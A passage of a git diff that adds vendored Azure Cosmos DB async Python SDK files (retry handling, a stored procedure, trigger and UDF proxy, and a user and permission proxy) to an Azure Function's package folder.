resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + + return result + except exceptions.CosmosHttpResponseError as e: + retry_policy = None + if e.status_code == StatusCodes.FORBIDDEN and e.sub_status == SubStatusCodes.WRITE_FORBIDDEN: + retry_policy = endpointDiscovery_retry_policy + elif e.status_code == StatusCodes.TOO_MANY_REQUESTS: + retry_policy = resourceThrottle_retry_policy + elif ( + e.status_code == StatusCodes.NOT_FOUND + and e.sub_status + and e.sub_status == SubStatusCodes.READ_SESSION_NOTAVAILABLE + ): + retry_policy = sessionRetry_policy + elif exceptions._partition_range_is_gone(e): + retry_policy = partition_key_range_gone_retry_policy + else: + retry_policy = defaultRetry_policy + + # If none of the retry policies applies or there is no retry needed, set the + # throttle related response headers and re-throw the exception back arg[0] + # is the request. 
It needs to be modified for write forbidden exception + if not retry_policy.ShouldRetry(e): + if not client.last_response_headers: + client.last_response_headers = {} + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + if args and args[0].should_clear_session_token_on_session_read_failure: + client.session.clear_session_token(client.last_response_headers) + raise + + # Wait for retry_after_in_milliseconds time before the next retry + await asyncio.sleep(retry_policy.retry_after_in_milliseconds / 1000.0) + if client_timeout: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + +async def ExecuteFunctionAsync(function, *args, **kwargs): + """Stub method so that it can be used for mocking purposes as well. + """ + return await function(*args, **kwargs) + + +class _ConnectionRetryPolicy(AsyncRetryPolicy): + + def __init__(self, **kwargs): + clean_kwargs = {k: v for k, v in kwargs.items() if v is not None} + super(_ConnectionRetryPolicy, self).__init__(**clean_kwargs) + + async def send(self, request): + """Sends the PipelineRequest object to the next policy. Uses retry settings if necessary. + Also enforces an absolute client-side timeout that spans multiple retry attempts. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises ~azure.core.exceptions.AzureError: Maximum retries exceeded. + :raises ~azure.cosmos.exceptions.CosmosClientTimeoutError: Specified timeout exceeded. + :raises ~azure.core.exceptions.ClientAuthenticationError: Authentication failed. 
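+
+        Note that ``timeout`` here is an absolute budget: the elapsed time of
+        every attempt, including sleeps between retries, is subtracted from it.
+        A hypothetical caller-side sketch (``pipeline`` is assumed to be an
+        azure-core ``AsyncPipeline`` built with this policy):
+
+            response = await pipeline.run(request, timeout=10)  # 10s across all retries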
+ """ + absolute_timeout = request.context.options.pop('timeout', None) + per_request_timeout = request.context.options.pop('connection_timeout', 0) + + retry_error = None + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + while retry_active: + try: + start_time = time.time() + _configure_timeout(request, absolute_timeout, per_request_timeout) + + response = await self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + await self.sleep(retry_settings, request.context.transport, response=response) + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except exceptions.CosmosClientTimeoutError as timeout_error: + timeout_error.inner_exception = retry_error + timeout_error.response = response + timeout_error.history = retry_settings['history'] + raise + except AzureError as err: + retry_error = err + if self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + await self.sleep(retry_settings, request.context.transport) + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_scripts.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_scripts.py new file mode 100644 index 0000000..cbc648f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_scripts.py @@ -0,0 +1,490 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete and execute scripts in the Azure Cosmos DB SQL API service. 
+""" + +from typing import Any, Dict, Union +from azure.core.async_paging import AsyncItemPaged + +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ._cosmos_client_connection_async import CosmosClientConnection as _CosmosClientConnection +from .._base import build_options as _build_options +from ..partition_key import NonePartitionKeyValue + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class ScriptType(object): + StoredProcedure = "sprocs" + Trigger = "triggers" + UserDefinedFunction = "udfs" + + +class ScriptsProxy(object): + """An interface to interact with stored procedures. + + This class should not be instantiated directly. Instead, use the + :func:`ContainerProxy.scripts` attribute. + """ + + def __init__( + self, + container: "ContainerProxy", + client_connection: _CosmosClientConnection, + container_link: str + ) -> None: + self.client_connection = client_connection + self.container_link = container_link + self.container_proxy = container + + def _get_resource_link(self, script_or_id: Union[Dict[str, Any], str], typ: str) -> str: + if isinstance(script_or_id, str): + return u"{}/{}/{}".format(self.container_link, typ, script_or_id) + return script_or_id["_self"] + + @distributed_trace + def list_stored_procedures( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List all stored procedures in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of stored procedures (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadStoredProcedures( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + @distributed_trace + def query_stored_procedures( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all stored procedures matching the given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of stored procedures (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + return self.client_connection.QueryStoredProcedures( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + @distributed_trace_async + async def get_stored_procedure(self, sproc: Union[str, Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]: + """Get the stored procedure identified by `sproc`. + + :param sproc: The ID (name) or dict representing the stored procedure to retrieve. 
+ :type sproc: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be retrieved. + :returns: A dict representing the retrieved stored procedure. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReadStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs + ) + + @distributed_trace_async + async def create_stored_procedure(self, body: Dict[str, Any], **kwargs: Any) -> Dict[str, Any]: + """Create a new stored procedure in the container. + + To replace an existing stored procedure, use the :func:`Container.scripts.replace_stored_procedure` method. + + :param Dict[str, Any] body: A dict-like object representing the stored procedure to create. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be created. + :returns: A dict representing the new stored procedure. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.CreateStoredProcedure( + collection_link=self.container_link, sproc=body, options=request_options, **kwargs + ) + + @distributed_trace_async + async def replace_stored_procedure( + self, + sproc: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replace a specified stored procedure in the container. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be replaced. + :type sproc: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the stored procedure to replace. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the stored + procedure with given id does not exist. + :returns: A dict representing the stored procedure after replace went through. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReplaceStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), + sproc=body, + options=request_options, + **kwargs + ) + + @distributed_trace_async + async def delete_stored_procedure(self, sproc: Union[str, Dict[str, Any]], **kwargs: Any) -> None: + """Delete a specified stored procedure from the container. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be deleted. + :type sproc: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The stored procedure wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The stored procedure does not exist in + the container. + :rtype: None + """ + request_options = _build_options(kwargs) + + await self.client_connection.DeleteStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs + ) + + @distributed_trace_async + async def execute_stored_procedure( + self, + sproc: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> Dict[str, Any]: + """Execute a specified stored procedure. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing the stored procedure to be executed. 
+ :type sproc: Union[str, Dict[str, Any]] + :keyword partition_key: Specifies the partition key to indicate which partition the stored procedure should + execute on. + :paramtype partition_key: Union[str, int, float, bool] + :keyword parameters: List of parameters to be passed to the stored procedure to be executed. + :paramtype parameters: List[Dict[str, Any]] + :keyword bool enable_script_logging: Enables or disables script logging for the current request. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the stored procedure execution failed + or if the stored procedure with given id does not exists in the container. + :returns: Result of the executed stored procedure for the given parameters. + :rtype: Dict[str, Any] + """ + + request_options = _build_options(kwargs) + partition_key = kwargs.pop("partition_key", None) + if partition_key is not None: + request_options["partitionKey"] = ( + _CosmosClientConnection._return_undefined_or_empty_partition_key( + await self.container_proxy.is_system_key) + if partition_key == NonePartitionKeyValue + else partition_key + ) + enable_script_logging = kwargs.pop('enable_script_logging', None) + if enable_script_logging is not None: + request_options["enableScriptLogging"] = enable_script_logging + + parameters = kwargs.pop("parameters", None) + return await self.client_connection.ExecuteStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), + params=parameters, + options=request_options, + **kwargs + ) + + @distributed_trace + def list_triggers(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all triggers in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of triggers (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadTriggers( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + @distributed_trace + def query_triggers( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all triggers matching the given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of triggers (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + return self.client_connection.QueryTriggers( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + @distributed_trace_async + async def get_trigger(self, trigger: Union[str, Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]: + """Get a trigger identified by `id`. + + :param trigger: The ID (name) or dict representing trigger to retrieve. 
+ :type trigger: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be retrieved. + :returns: A dict representing the retrieved trigger. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReadTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs + ) + + @distributed_trace_async + async def create_trigger(self, body: Dict[str, Any], **kwargs: Any) -> Dict[str, Any]: + """Create a trigger in the container. + + To replace an existing trigger, use the :func:`ContainerProxy.scripts.replace_trigger` method. + + :param Dict[str, Any] body: A dict-like object representing the trigger to create. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be created. + :returns: A dict representing the new trigger. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.CreateTrigger( + collection_link=self.container_link, trigger=body, options=request_options, **kwargs + ) + + @distributed_trace_async + async def replace_trigger( + self, + trigger: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replace a specified trigger in the container. + + If the trigger does not already exist in the container, an exception is raised. + + :param trigger: The ID (name) or dict representing trigger to be replaced. + :type trigger: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the trigger to replace. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the trigger with given + id does not exist. + :returns: A dict representing the trigger after replace went through. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReplaceTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), + trigger=body, + options=request_options, + **kwargs + ) + + @distributed_trace_async + async def delete_trigger(self, trigger: Union[str, Dict[str, Any]], **kwargs: Any) -> None: + """Delete a specified trigger from the container. + + If the trigger does not already exist in the container, an exception is raised. + + :param trigger: The ID (name) or dict representing trigger to be deleted. + :type trigger: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The trigger wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The trigger does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + + await self.client_connection.DeleteTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs + ) + + @distributed_trace + def list_user_defined_functions( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List all the user-defined functions in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of user-defined functions (dicts). 
+ :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadUserDefinedFunctions( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + @distributed_trace + def query_user_defined_functions( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return user-defined functions matching a given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of user-defined functions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + return self.client_connection.QueryUserDefinedFunctions( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + @distributed_trace_async + async def get_user_defined_function(self, udf: Union[str, Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]: + """Get a user-defined function identified by `id`. + + :param udf: The ID (name) or dict representing udf to retrieve. + :type udf: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be retrieved. + :returns: A dict representing the retrieved user-defined function. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReadUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) + + @distributed_trace_async + async def create_user_defined_function(self, body: Dict[str, Any], **kwargs: Any) -> Dict[str, Any]: + """Create a user-defined function in the container. + + To replace an existing user-defined function, use the + :func:`ContainerProxy.scripts.replace_user_defined_function` method. + + :param Dict[str, Any] body: A dict-like object representing the user-defined function to create. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be created. + :returns: A dict representing the new user-defined function. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.CreateUserDefinedFunction( + collection_link=self.container_link, udf=body, options=request_options, **kwargs + ) + + @distributed_trace_async + async def replace_user_defined_function( + self, + udf: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replace a specified user-defined function in the container. + + If the user-defined function does not already exist in the container, an exception is raised. + + :param udf: The ID (name) or dict representing user-defined function to be replaced. 
+ :type udf: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the udf to replace. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the user-defined function + with the given id does not exist. + :returns: A dict representing the user-defined function after replace went through. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReplaceUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), + udf=body, + options=request_options, + **kwargs + ) + + @distributed_trace_async + async def delete_user_defined_function(self, udf: Union[str, Dict[str, Any]], **kwargs: Any) -> None: + """Delete a specified user-defined function from the container. + + If the user-defined function does not already exist in the container, an exception is raised. + + :param udf: The ID (name) or dict representing udf to be deleted. + :type udf: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The udf wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The UDF does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + + await self.client_connection.DeleteUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_user.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_user.py new file mode 100644 index 0000000..d1be685 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_user.py @@ -0,0 +1,318 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +"""Create, read, update and delete users in the Azure Cosmos DB SQL API service. 
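+
+A brief usage sketch (``database`` stands in for an existing DatabaseProxy; the
+permission body is illustrative):
+
+    user = await database.upsert_user({"id": "bob"})
+    permission = await user.create_permission({
+        "id": "read-only",
+        "permissionMode": "Read",
+        "resource": "dbs/mydb/colls/mycoll",
+    })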
+""" + +from typing import Any, Dict, Union, cast +from azure.core.async_paging import AsyncItemPaged + +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options +from ..permission import Permission + + +class UserProxy(object): + """An interface to interact with a specific user. + + This class should not be instantiated directly. Instead, use the + :func:`DatabaseProxy.get_user_client` method. + """ + + def __init__( + self, + client_connection: CosmosClientConnection, + id: str, # pylint: disable=redefined-builtin + database_link: str, + properties: Dict[str, Any] = None + ) -> None: + self.client_connection = client_connection + self.id = id + self.user_link = u"{}/users/{}".format(database_link, id) + self._properties = properties + + def __repr__(self) -> str: + return "".format(self.user_link)[:1024] + + def _get_permission_link(self, permission_or_id: Union[Permission, str, Dict[str, Any]]) -> str: + if isinstance(permission_or_id, str): + return u"{}/permissions/{}".format(self.user_link, permission_or_id) + try: + return cast("Permission", permission_or_id).permission_link + except AttributeError: + pass + return u"{}/permissions/{}".format(self.user_link, cast("Dict[str, str]", permission_or_id)["id"]) + + async def _get_properties(self) -> Dict[str, Any]: + if self._properties is None: + self._properties = await self.read() + return self._properties + + @distributed_trace_async + async def read(self, **kwargs: Any) -> Dict[str, Any]: + """Read user properties. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be retrieved. + :returns: A dictionary of the retrieved user properties. + :rtype: Dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + self._properties = await self.client_connection.ReadUser(user_link=self.user_link, + options=request_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def list_permissions(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all permission for the user. + + :keyword int max_item_count: Max number of permissions to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]], None] + :returns: An AsyncItemPaged of permissions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadPermissions(user_link=self.user_link, options=feed_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + return result + + @distributed_trace + def query_permissions( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all permissions matching the given `query`. 
+ + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: Optional[List[Dict[str, Any]]] + :keyword int max_item_count: Max number of permissions to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of permissions (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + result = self.client_connection.QueryPermissions( + user_link=self.user_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + return result + + @distributed_trace_async + async def get_permission( + self, + permission: Union[str, Dict[str, Any], Permission], + **kwargs: Any + ) -> Permission: + """Get the permission identified by `id`. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be retrieved. + :type permission: Union[str, Dict[str, Any], ~azure.cosmos.Permission] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be retrieved. + :returns: The retrieved permission object. + :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission_resp = await self.client_connection.ReadPermission( + permission_link=self._get_permission_link(permission), options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission_resp) + + return Permission( + id=permission_resp["id"], + user_link=self.user_link, + permission_mode=permission_resp["permissionMode"], + resource_link=permission_resp["resource"], + properties=permission_resp, + ) + + @distributed_trace_async + async def create_permission(self, body: Dict[str, Any], **kwargs: Any) -> Permission: + """Create a permission for the user. + + To update or replace an existing permission, use the :func:`UserProxy.upsert_permission` method. + + :param body: A dict-like object representing the permission to create. + :type body: Dict[str, Any] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be created. + :returns: A permission object representing the new permission. 
+ :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission = await self.client_connection.CreatePermission( + user_link=self.user_link, permission=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission) + + return Permission( + id=permission["id"], + user_link=self.user_link, + permission_mode=permission["permissionMode"], + resource_link=permission["resource"], + properties=permission, + ) + + @distributed_trace_async + async def upsert_permission(self, body: Dict[str, Any], **kwargs: Any) -> Permission: + """Insert or update the specified permission. + + If the permission already exists in the container, it is replaced. If + the permission does not exist, it is inserted. + + :param body: A dict-like object representing the permission to update or insert. + :type body: Dict[str, Any] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission could not be upserted. + :returns: A dict representing the upserted permission. + :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission = await self.client_connection.UpsertPermission( + user_link=self.user_link, permission=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission) + + return Permission( + id=permission["id"], + user_link=self.user_link, + permission_mode=permission["permissionMode"], + resource_link=permission["resource"], + properties=permission, + ) + + @distributed_trace_async + async def replace_permission( + self, + permission: Union[str, Dict[str, Any], Permission], + body: Dict[str, Any], + **kwargs: Any + ) -> Permission: + """Replaces the specified permission if it exists for the user. + + If the permission does not already exist, an exception is raised. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be replaced. + :type permission: Union[str, Dict[str, Any], ~azure.cosmos.Permission] + :param body: A dict-like object representing the permission to replace. + :type body: Dict[str, Any] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the permission + with given id does not exist. + :returns: A permission object representing the permission after the replace went through. 
